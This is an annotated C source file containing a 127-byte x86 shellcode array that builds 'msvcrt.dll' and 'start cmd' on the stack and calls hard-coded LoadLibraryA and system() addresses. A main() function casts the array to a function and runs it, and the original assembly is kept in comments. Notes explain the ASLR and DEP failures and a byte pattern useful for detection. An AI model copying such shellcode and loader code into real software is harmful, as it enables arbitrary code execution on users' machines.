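/*
 * shellCode: 127 bytes of 32-bit x86 machine code (plus the string
 * literal's terminating NUL), annotated from the assembly listing kept in
 * main(). It builds two NUL-terminated strings on the stack one byte at a
 * time, "msvcrt.dll" and "start cmd", and calls two absolute addresses with
 * them.
 *
 * Notes for anyone analysing a sample of this shape:
 *  - The call targets are hard-coded immediates (0x76794bc6, 0x7672b177).
 *    They are the addresses the author observed for LoadLibraryA and
 *    system() on one machine; with ASLR the modules load elsewhere, so the
 *    same bytes jump to unrelated memory on another system or boot.
 *  - The strings never appear contiguously in the image: each character is
 *    the immediate of a C6 45 xx (mov byte [ebp+disp8], imm8) instruction.
 *    A plain strings scan misses them; the repeated C6 45 xx pattern with
 *    printable immediates is the recognisable artefact.
 *
 * The forum markup ([B][COLOR=...]) that had leaked into the two
 * "mov eax, imm32" lines has been removed; it was not part of the bytes and
 * prevented the array from compiling.
 */
unsigned char shellCode[] =
    "\x55"                      /* push ebp                          */
    "\x8B\xEC"                  /* mov  ebp, esp                     */
    "\x83\xEC\x0C"              /* sub  esp, 0Ch                     */
    "\xC6\x45\xF5\x6D"          /* mov  byte [ebp-0Bh], 'm'          */
    "\xC6\x45\xF6\x73"          /* mov  byte [ebp-0Ah], 's'          */
    "\xC6\x45\xF7\x76"          /* mov  byte [ebp-09h], 'v'          */
    "\xC6\x45\xF8\x63"          /* mov  byte [ebp-08h], 'c'          */
    "\xC6\x45\xF9\x72"          /* mov  byte [ebp-07h], 'r'          */
    "\xC6\x45\xFA\x74"          /* mov  byte [ebp-06h], 't'          */
    "\xC6\x45\xFB\x2E"          /* mov  byte [ebp-05h], '.'          */
    "\xC6\x45\xFC\x64"          /* mov  byte [ebp-04h], 'd'          */
    "\xC6\x45\xFD\x6C"          /* mov  byte [ebp-03h], 'l'          */
    "\xC6\x45\xFE\x6C"          /* mov  byte [ebp-02h], 'l'          */
    "\xC6\x45\xFF\x00"          /* mov  byte [ebp-01h], 0            */
    "\x8D\x45\xF5"              /* lea  eax, [ebp-0Bh]               */
    "\x50"                      /* push eax                          */
    "\xB8\xC6\x4B\x79\x76"      /* mov  eax, 0x76794bc6 (LoadLibraryA on the author's system) */
    "\xFF\xD0"                  /* call eax                          */
    "\xC6\x45\xF4\x73"          /* mov  byte [ebp-0Ch], 's'          */
    "\xC6\x45\xF5\x74"          /* mov  byte [ebp-0Bh], 't'          */
    "\xC6\x45\xF6\x61"          /* mov  byte [ebp-0Ah], 'a'          */
    "\xC6\x45\xF7\x72"          /* mov  byte [ebp-09h], 'r'          */
    "\xC6\x45\xF8\x74"          /* mov  byte [ebp-08h], 't'          */
    "\xC6\x45\xF9\x20"          /* mov  byte [ebp-07h], ' '          */
    "\xC6\x45\xFA\x63"          /* mov  byte [ebp-06h], 'c'          */
    "\xC6\x45\xFB\x6D"          /* mov  byte [ebp-05h], 'm'          */
    "\xC6\x45\xFC\x64"          /* mov  byte [ebp-04h], 'd'          */
    "\xC6\x45\xFD\x00"          /* mov  byte [ebp-03h], 0            */
    "\xC6\x45\xFE\x00"          /* mov  byte [ebp-02h], 0            */
    "\x8D\x45\xF4"              /* lea  eax, [ebp-0Ch]               */
    "\x50"                      /* push eax                          */
    "\xB8\x77\xB1\x72\x76"      /* mov  eax, 0x7672b177 (system() on the author's system) */
    "\xFF\xD0"                  /* call eax                          */
    "\x58"                      /* pop  eax                          */
    "\x58"                      /* pop  eax                          */
    "\x83\xC4\x04"              /* add  esp, 04h                     */
    "\x83\xC4\x0C"              /* add  esp, 0Ch                     */
    "\x8B\xE5"                  /* mov  esp, ebp                     */
    "\x5D";                     /* pop  ebp                          */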
int main()
{
    /*
     * Reinterpret the shellCode byte array as a function taking no
     * arguments and call it.
     *
     * The array lives in the program's writable data, so where DEP/NX
     * applies to the process the page is not executable and this call
     * raises an access violation instead of running the bytes. Converting
     * an object pointer to a function pointer is also outside what ISO C
     * defines; it only works as a compiler/platform extension.
     *
     * NOTE(review): the byte sequence stops at `pop ebp` with nothing after
     * it that hands control back, so execution is expected to run past the
     * end of the array rather than reach `return 0` below.
     */
    typedef void (*entry_fn)(void);
    entry_fn entry = (entry_fn)shellCode;
    entry();

    // Assembly the byte array was produced from (kept for reference).
    // The two call targets are absolute addresses taken from the author's
    // machine; they are not valid on a system where ASLR loads the modules
    // at a different base.
    //
    // __asm{
    //     push ebp
    //     mov  ebp, esp
    //
    //     sub  esp, 0ch
    //
    //     mov  [ebp-0bh], 6dh   ; m
    //     mov  [ebp-0ah], 73h   ; s
    //     mov  [ebp-09h], 76h   ; v
    //     mov  [ebp-08h], 63h   ; c
    //     mov  [ebp-07h], 72h   ; r
    //     mov  [ebp-06h], 74h   ; t
    //     mov  [ebp-05h], 2eh   ; .
    //     mov  [ebp-04h], 64h   ; d
    //     mov  [ebp-03h], 6ch   ; l
    //     mov  [ebp-02h], 6ch   ; l
    //     mov  [ebp-01h], 0h    ; \0
    //
    //     lea  eax, [ebp-0bh]
    //     push eax
    //     mov  eax, 0x76794bc6  ; LoadLibraryA, _stdcall
    //     call eax
    //     ;pop eax
    //
    //     mov  [ebp-0ch], 73h   ; s
    //     mov  [ebp-0bh], 74h   ; t
    //     mov  [ebp-0ah], 61h   ; a
    //     mov  [ebp-09h], 72h   ; r
    //     mov  [ebp-08h], 74h   ; t
    //     mov  [ebp-07h], 20h   ; (space)
    //     mov  [ebp-06h], 63h   ; c
    //     mov  [ebp-05h], 6dh   ; m
    //     mov  [ebp-04h], 64h   ; d
    //     mov  [ebp-03h], 0     ; \0
    //     mov  [ebp-02h], 0h    ;
    //     ;mov [ebp-01h], 0h    ;
    //
    //     lea  eax, [ebp-0ch]
    //     push eax
    //     mov  eax, 0x7672b177  ; system()
    //     call eax
    //
    //     pop  eax
    //     pop  eax
    //     add  esp, 04h
    //     add  esp, 0ch
    //
    //     mov  esp, ebp
    //     pop  ebp
    // }
    return 0;
}